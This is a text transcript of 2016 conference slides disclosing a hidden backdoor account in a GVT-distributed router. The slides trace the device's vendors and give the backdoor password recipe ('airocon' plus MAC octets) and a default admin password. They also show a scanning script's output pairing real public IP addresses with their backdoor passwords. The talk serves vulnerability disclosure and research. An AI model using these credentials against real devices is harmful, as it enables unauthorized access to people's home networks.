[cb16] who put the backdoor in my modem? by ewerson guimaraes
TRANSCRIPT
![Page 1: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/1.jpg)
CONFIDENTIAL
Who put the backdoor in my router?
Ewerson Guimarães (Crash) / 2016
![Page 2: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/2.jpg)
CONFIDENTIAL
Research Information
This talk was born in Área31 hackerspace.
All information contained here is public.
No one was hacked(cof cof)
![Page 3: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/3.jpg)
CONFIDENTIAL
About Ewerson(Crash):
![Page 4: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/4.jpg)
CONFIDENTIAL
Background...
![Page 5: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/5.jpg)
CONFIDENTIAL
Background...
![Page 6: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/6.jpg)
CONFIDENTIAL
Background...
![Page 7: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/7.jpg)
CONFIDENTIAL
Background...
![Page 8: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/8.jpg)
CONFIDENTIAL
Let’s start...
![Page 9: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/9.jpg)
CONFIDENTIAL
We won't talk about the backdoor itself, so…
![Page 10: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/10.jpg)
CONFIDENTIAL
Here is the backdoor...
![Page 11: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/11.jpg)
CONFIDENTIAL
Usernames are equal but one is a backdoor account
![Page 12: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/12.jpg)
CONFIDENTIAL
Transforming a single user in a backdoor...
![Page 13: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/13.jpg)
CONFIDENTIAL
Let's analyze the hardware
![Page 14: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/14.jpg)
CONFIDENTIAL
The Strange Device
Strange ID TAG!
![Page 15: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/15.jpg)
CONFIDENTIAL
The strange Device
The device is approved by ANATEL (Brazilian National Telecomunication Agency)
![Page 16: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/16.jpg)
CONFIDENTIAL
The strange Device
The device is approved by ANATEL (Brazilian National Telecomunication Agency)
![Page 17: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/17.jpg)
CONFIDENTIAL
More strange stuff...
BayTech:
![Page 18: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/18.jpg)
CONFIDENTIAL
BayTech:
18
![Page 19: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/19.jpg)
CONFIDENTIAL
More strange stuff...
If you look for S&T Technology Shen Zhen .Co LTD:
![Page 20: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/20.jpg)
CONFIDENTIAL
More strange stuff...
In the device manger you can see Observa Telecom but....
The vendor's website exists but it's a single branded blank page, without any other links to other areas such as manuals, support and firmware.
![Page 21: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/21.jpg)
CONFIDENTIAL
More strange stuff...
Of course, he didn't reply (11)emails...
![Page 22: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/22.jpg)
CONFIDENTIAL
More strange stuff..
This device is distributed by GVT (Global Village Telecom). According to GVT technical support and site, this modem/router is not supported by them.
Don’t belive? Take a look at:http://www.gvt.com.br/PortalGVT/Atendimento/Area-Aberta/Documentos/Lista-de-Modens
![Page 23: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/23.jpg)
CONFIDENTIAL
More strange stuff..
Opening its firmware in hex viewer... Wow wait, it’s made by TPLINK??????
![Page 24: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/24.jpg)
CONFIDENTIAL
More strange stuff..
The backdoor password: MAC Address last two octets + airocon string
![Page 25: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/25.jpg)
CONFIDENTIAL
More strange stuff..
What is Airocon?
25
![Page 26: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/26.jpg)
CONFIDENTIAL
More strange stuff..
What is Airocon?
![Page 27: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/27.jpg)
CONFIDENTIAL
More strange stuff..
The last avaliable site (Mar. 2005)
![Page 28: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/28.jpg)
CONFIDENTIAL
More strange stuff..
Do you remember the tag ID and Anatel seal?
28
Bingo! 41C3
![Page 29: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/29.jpg)
CONFIDENTIAL
...and to finish this strange part...
Hadware vendor: Realtek
![Page 30: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/30.jpg)
CONFIDENTIAL
Inside of backdoor...
Login with normal admin user ( admin:gtv12345)
The commands “sh” and "login show" are disabled.
![Page 31: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/31.jpg)
CONFIDENTIAL
Inside of backdoor...When logged in with a backdoor account:
![Page 32: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/32.jpg)
CONFIDENTIAL
Inside of backdoor...
The “login show” command shows the backdoor account (which is hidden on the web interface)
![Page 33: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/33.jpg)
CONFIDENTIAL
Inside of backdoor...
Taking a closer look at the device’s memory it was possible to find some interesting information:
Redirection link to Chinese company:
Even after reset it was possible to retrieve the device’s previous user name:
The device saves neighbour network names:
![Page 34: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/34.jpg)
CONFIDENTIAL
Inside of backdoor...
Sensitive data about GVT credential services:
![Page 35: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/35.jpg)
CONFIDENTIAL
Inside of backdoor...
Furthermore, the admin page for the backdoor user is completely different from the common admin page.
![Page 36: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/36.jpg)
CONFIDENTIAL
Inside of backdoor...
The factory default password is not admin:admin admin:12345 admin:
You can make the factory reset!The password stills: admin:gvt12345
![Page 37: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/37.jpg)
CONFIDENTIAL
Outside of backdoor...
Shodan is your friend,or not...
Divice exposed in internet: Almost 5600
![Page 38: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/38.jpg)
CONFIDENTIAL
Small shell script:
root@anubis:~# ./gvtfucker.shGVT RTN04 F*cker
Testing:177.206.29.204Backdoor password: airocon2533Testing:179.179.72.251Testing:189.113.134.199Backdoor password: airocon0E6BTesting:186.213.233.192Testing:186.215.19.197Testing:189.113.136.93Backdoor password: airoconCE4ATesting:189.113.138.111Testing:189.113.137.203Testing:189.26.50.164Testing:189.58.16.44Testing:191.248.83.225Testing:177.132.241.119Backdoor password: airocon02CCTesting:177.156.255.85Testing:177.156.36.116Backdoor password: airoconFA1ETesting:177.157.166.210Testing:187.59.45.9Testing:189.113.131.161Testing:189.113.131.197Testing:189.113.134.226Testing:189.113.137.32Testing:189.113.138.111Backdoor password: airoconDA32
![Page 39: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/39.jpg)
CONFIDENTIAL
Outside of backdoor...
![Page 40: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/40.jpg)
CONFIDENTIAL
Outside of backdoor...
![Page 41: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/41.jpg)
CONFIDENTIAL
Inside again
![Page 42: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/42.jpg)
CONFIDENTIAL
Updates....
After around 1 year later, the Observa site was updated.
![Page 43: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/43.jpg)
CONFIDENTIAL
Updates....
After around 1 year later, the Observa site was updated.
![Page 44: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/44.jpg)
CONFIDENTIAL
Updates....
I tryed another contact...
![Page 45: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/45.jpg)
CONFIDENTIAL
How to fix
Change the backdoor flag,upload the file and neverreset to factory defaults.
OR / AND
Of course, disable the remote access.Hack the firmaware
![Page 46: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/46.jpg)
CONFIDENTIAL
Considerations
AUDIT YOUR DECIVES!
BURN YOUR DEVICES!
FUZZ and F*CK YOUR DEVICES!
![Page 47: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/47.jpg)
CONFIDENTIAL
And the golden question:
Who put the backdoor in my router?
![Page 48: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/48.jpg)
CONFIDENTIAL
Questions?
Please, say your full name before to ask*.
* I have a Death Note.
![Page 49: [CB16] Who put the backdoor in my modem? by Ewerson Guimaraes](https://reader033.vdocuments.site/reader033/viewer/2022051521/587756d91a28ab84388b77c1/html5/thumbnails/49.jpg)
CONFIDENTIAL
THANKS
49